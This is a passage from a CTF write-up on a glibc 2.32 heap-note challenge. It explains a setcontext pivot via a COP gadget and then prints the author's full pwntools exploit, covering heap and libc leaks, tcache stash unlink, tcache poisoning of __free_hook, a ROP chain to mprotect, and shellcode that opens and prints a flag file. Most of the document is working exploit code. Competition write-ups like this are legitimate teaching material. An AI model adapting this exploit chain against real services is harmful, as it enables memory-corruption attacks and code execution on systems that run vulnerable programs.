However, starting around libc 2.29 (?), setcontext relies on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which seems to exist in many newer glibc versions) that lets us load rdx from rdi and then call an address relative to rdx. In this libc, it was the following:
mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
This makes things relatively trivial, as we can just set up the heap for the ROP (taking care of the one push rcx instruction setcontext performs). I went for an mprotect to make the heap rwx, then pivoted to shellcode on the heap that does the open/read/write/exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate from some of the larger chunks again, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607 #: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972 #: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
context(arch='amd64')
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
syscall
xor rax, rax
mov al, 1
mov rdi, 1
syscall
mov al, 60
xor rdi, rdi
syscall
''' % int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
free(7)
context.log_level='debug'
print p.recvall()
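To unpack the dense payload above: the freed chunk's data pointer becomes rdi, and the payload's second qword makes rdx point back at the same buffer (which, per the payload's own constants, sits at heapbase + 0x2410). Roughly, the layout looks like this; the offsets follow the setcontext disassembly shown earlier, and the heap constants are specific to my heap layout:
# offsets are relative to rdx == the freed chunk's data (heapbase + 0x2410)
pivot_layout = {
    0x08: heapbase + 0x2410,                  # gadget: mov rdx, [rdi + 8] -> rdx points at this buffer
    0x20: libc.symbols['setcontext'] + 61,    # gadget: call [rdx + 0x20]
    0xa0: heapbase + 0x2410 + 0x30,           # setcontext: mov rsp, [rdx + 0xa0] -> pivot into the buffer
    0xa8: poprdi,                             # setcontext: rcx = [rdx + 0xa8] gets pushed, so it runs first
    0x30: heapbase,                           # popped into rdi
    0x38: poprsi, 0x40: 0x5000,               # rsi = 0x5000
    0x48: poprdx, 0x50: 7,                    # rdx = 7 (rwx)
    0x58: libc.symbols['mprotect'],           # mprotect(heapbase, 0x5000, 7)
    0x60: heapbase + 0x2920 + 0x10,           # mprotect returns into the shellcode in the next chunk
}
The push rcx lands at offset 0x28 on the new stack, which is why the payload also keeps a pop rdi there.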
Final Exploit:
Do note that for this writeup, I nop'd out the sleep for the sake of local testing. However, running the script against the provided ynetd binary (as the CTF server is no longer up), even with a 3 second timeout added onto each option, still finished more than 10 minutes under the sigalarm limit, so it should have been fine in the actual competition scenario.
from pwn import *

elf = ELF('./challenge')
libc = ELF('./libc.so.6') # 2.32
p = remote('localhost', 1337)

def wait():
    p.recvrepeat(0.1)

def alloc(size, data, line=True):
    assert(size > 0x100 and size <= 0x2000)
    if len(data) == size:
        line = False
    wait()
    p.sendline('1')
    wait()
    p.send(str(size))
    wait()
    if line:
        p.sendline(data)
    else:
        p.send(data)

def free(idx):
    wait()
    p.sendline('2')
    wait()
    p.sendline(str(idx))

def leak(idx):
    wait()
    p.sendline('3')
    wait()
    p.sendline(str(idx))

def edit(idx, data, line=True):
    wait()
    p.sendline('4')
    wait()
    p.sendline(str(idx))
    wait()
    if line:
        p.sendline(data)
    else:
        p.send(data)
alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
free(1)
free(3)
free(6)
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain
free(3)
free(8)
free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
free(18)
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)
log.info("achieved backwards coalesce")
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
leak(3)
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0
log.info('heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
leak(5)
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270
log.info('libc base: 0x%x' % libc.address)
free(18)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
free(18)
free(10)
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# now we need to get stuff into tcache to be able to tcache poison, but they keep clearing tcache
# so tcache stash unlink onto malloc_par's tcache_bins
# but to do tcache stash unlink, we technically need to stash 6 chunks into tcache and 2 chunks into smallbin, and then modify bk of last chunk getting stashed
# here, tcache is wiped every time we call malloc so that won't work... so we need 15 chunks of the same size, to all free and then move the latter 8 to smallbin, and then overwrite bk of last one to stash
# we have 0x108 in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10 as of now, need 5 more
'''
0x56494efda520: 0x000056494fd352c0 0x000056494fd36b40 S
0x56494efda530: 0x000056494fd35b50 X 0x000056494fd35c60
0x56494efda540: 0x000056494fd360a0 X 0x000056494fd361b0
0x56494efda550: 0x000056494fd365f0 S 0x000056494fd36a30 X
0x56494efda560: 0x000056494fd35730 0x000056494fd37050 S
0x56494efda570: 0x000056494fd35710 X 0x000056494fd37d60
0x56494efda580: 0x000056494fd381d0 X 0x000056494fd382e0 X
0x56494efda590: 0x000056494fd383f0 X 0x000056494fd38500 X
0x56494efda5a0: 0x000056494fd38610 X 0x000056494fd38720 X
0x56494efda5b0: 0x0000000000000000
0x56494fd37d50 is the cutoff of the massive unsorted chunk at this point
from here, looks like a good choice to save index 9, 1, and 6 (so one for tcache poison, one for bk overwrite, and the other just for padding/backup purposes (also don't want an extra unsorted chunk)
so we will free 0 3 5 8 11 and have free slots 0 3 5 8 11 18, we can use one of these to help as pad
however freeing some of these directly is bad as it creates a messy unsorted chain, better to do the allocate 2 chunks, recoalesce back trick to make our target chunks to be freed 0x21
'''
# coalesce 11 into big unsorted
free(11)
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
free(11)
free(3)
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
free(11)
free(3)
free(5)
# free index 8 now too, could have been done earlier
free(8)
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
free(5)
free(3)
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(5)
free(3)
log.info('hopefully cleaned up heap')
# get another unsorted
free(0)
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
free(5)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
free(5)
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevent 18 from consolidating with unsorted
# now we finally have 15 of these 0x110 chunks, we need the one in 18 to be the last in smallbin
'''
0x563e099eb520: 0x0000563e09b562c0 X 0x0000563e09b57b40
0x563e099eb530: 0x0000563e09b56b50 X 0x0000563e09b563d0 X
0x563e099eb540: 0x0000563e09b570a0 X 0x0000563e09b57760 X
0x563e099eb550: 0x0000563e09b575f0 0x0000563e09b57a30 X
0x563e099eb560: 0x0000563e09b56820 X 0x0000563e09b58050
0x563e099eb570: 0x0000563e09b56710 X 0x0000563e09b56930
0x563e099eb580: 0x0000563e09b591d0 X 0x0000563e09b592e0 X
0x563e099eb590: 0x0000563e09b593f0 X 0x0000563e09b59500 X
0x563e099eb5a0: 0x0000563e09b59610 X 0x0000563e09b59720 X
0x563e099eb5b0: 0x0000563e09b57650 X 0x0000000000000000
0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18
12 to 17 is a chain, (12 will back coalesce), 0, 3 is a chain, 8, 10 is a chain, 5 is on top of unsorted, 7 is under a potential new unsorted (so will coalesce with the smallbin and move to unsorted), 18 needs to be the last one inserted, 2, 4 are isolated
so let's do the following free order: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18
'''
free(14)
free(16)
free(3)
free(10)
free(5)
free(12)
free(7)
free(17)
free(2)
free(13)
free(15)
free(0)
free(8)
free(4)
free(18)
# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
free(0)
free(6)
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink
log.info('tcache stash unlinked, overwrote mp_.tcache_bin')
# can't touch 0x110 smallbin ever again
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(4)
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607 #: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972 #: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
context(arch='amd64')
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
syscall
xor rax, rax
mov al, 1
mov rdi, 1
syscall
mov al, 60
xor rdi, rdi
syscall
''' % int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
free(7)
context.log_level='debug'
print p.recvall()
Concluding thoughts:
While this challenge was overall pretty decent, as it showed some up-to-date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. It could have been just as difficult conceptually if it allowed for 2-3 more allocation slots (rather than forcing players who have the correct plan to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made to this libc makes sense and did contribute to the overall quality, I have been seeing libc patching happen more often, and I hope CTF authors do not abuse it to create extremely contrived heap note problems.
Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all the teammates who worked with me in DiceGang, which placed 4th overall!